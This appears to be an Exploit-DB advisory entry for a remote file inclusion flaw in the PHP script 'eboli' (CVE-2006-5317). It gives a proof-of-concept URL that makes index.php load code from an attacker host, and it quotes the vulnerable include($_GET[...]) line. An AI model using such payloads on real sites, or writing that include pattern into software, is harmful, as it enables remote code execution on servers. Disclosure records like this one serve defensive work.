eboli - 'index.php' Remote File Inclusion
Author: DarkFig
type: webapps
platform: php
port:
date_added: 2006-10-09
date_updated:
verified: 1
codes: OSVDB-30866;CVE-2006-5317
tags:
aliases:
screenshot_url:
application_url:
#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?
#
# Affected.scr: eboli
# Download....: http://www.jhjgubbels.nl/eboli/eboli.tar.gz
# Poc.........: http://x.com/index.php?contentSpecial=http://hack.c/back.txt?&content
# Vuln.code...: Line 45, if(isset($_GET['contentSpecial']) && isset($_GET['content'])){
# include($_GET['contentSpecial']);
# milw0rm.com [2006-10-10]